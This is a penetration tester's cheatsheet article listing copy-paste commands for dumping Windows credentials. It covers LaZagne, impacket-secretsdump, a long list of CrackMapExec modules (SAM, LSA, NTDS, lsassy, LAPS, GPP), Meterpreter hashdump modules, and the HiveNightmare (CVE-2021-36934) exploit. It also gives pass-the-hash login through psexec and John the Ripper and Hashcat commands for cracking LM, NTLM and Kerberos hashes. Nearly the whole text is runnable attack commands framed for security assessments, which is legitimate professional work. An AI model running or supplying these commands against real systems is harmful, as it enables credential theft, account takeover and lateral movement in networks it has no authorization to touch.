
Windows — Credentials Dumping
by Karol Mazurek
Cheatsheet with current tools & techniques for Windows credentials dumping.
INTRODUCTION
The article presents the current tools & techniques for Windows credential dumping. It will be very short and written in cheatsheet style. The main goal was to aggregate commands in one place, so you can just copy&paste them during the assessment. As a bonus to this short article, in the end, you will find the commands for cracking Windows hashes using John The Ripper and Hashcat.
TOOLS
- LaZagne
- Impacket
- CrackMapExec
- HiveNightmare (CVE-2021–36934)
- Meterpreter — credential_collector
- Meterpreter — smart_hashdump
COMMANDS
- Finding passwords for the most commonly-used software:
laZagne.exe all
- Manual search for the text ‘password’ in certain file types:
findstr /si 'password' *.txt *.xml *.docx
- Remote hash dumping without executing any agent on the target:
impacket-secretsdump $domain/$user:[email protected]$ip
- Various hash dumping techniques using CME:
(use option--local-auth
if your user is a local account)
crackmapexec smb $ip -u $user -p $pass --sam
crackmapexec smb $ip -u $user -p $pass --lsa
crackmapexec smb $ip -u $user -p $pass --ntds
crackmapexec smb $ip -u $user -p $pass --ntds vss
crackmapexec smb $ip -u $user -p $pass -M lsassy
crackmapexec smb $ip -u $user -p $pass -M wireless
crackmapexec smb $ip -u $user -p $pass -M handlekatz
crackmapexec smb $ip -u $user -p $pass -M nanodump
crackmapexec smb $ip -u $user -p $pass -M procdump
crackmapexec smb $ip -u $user -p $pass --laps
crackmapexec smb $ip -u $user -p $pass -M gpp_password
If the default administrator name is not administrator add the user name after the option:
--laps <name>
- Decrypting GPP:
gpp-decrypt $encrypted_password
- Meterpreter modules:
(A good idea is to first migrate to the lsass.exe process)
migrate <id of lsass.exe>
run post/windows/gather/credentials/credential_collector
run post/windows/gather/smart_hashdump
CVE-2021–36934 aka SeriousSam
Exploit allowing you to read any registry hives as non-admin.
- Get
SAM
,SECURITY
andSYSTEM
hive dumps:
.\HiveNightmare.exe
- Download those 3 files to your machine and dump the hashes:
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY local
- Log in to the remote system using the PSHtechnique:
impacket-psexec -hashes $hash [email protected]$ip
CRACKING
- LM
john --format=lm hash.txt
hashcat -m 3000 -a 3 hash.txt
- NTML
john --format=nt hash.txt
hashcat -m 1000 -a 3 hash.txt
- NTLMv1
john --format=netntlm hash.txt
hashcat -m 5500 -a 3 hash.txt
- NTLMv2
john --format=netntlmv2 hash.txt
hashcat -m 5600 -a 0 hash.txt
- Kerberos 5 TGS
john --format=krb5tgs hash.txt --wordlist=rockyou.txt
hashcat -m 13100 -a 0 hash.txt rockyou.txt
- Kerberos ASREP
john --format=krb5asrep hash.txt --wordlist=rockyou.txt
hashcat -m18200 hash.txt rockyou.txt
FINAL WORDS
During the creation of the list with the above-mentioned commands, I tried not to use several tools for the same task — that is why legendary Mimikatz is not there. If you have any ideas on how to improve the above list with commands that dump passwords using techniques not mentioned above then feel free to comment.
I hope you will find the above tools & commands useful for your assessment!
About the Author
Karol Mazurek - penetration tester.
The article was originally published at: https://karol-mazurek95.medium.com/windows-credentials-dumping-5898d896d048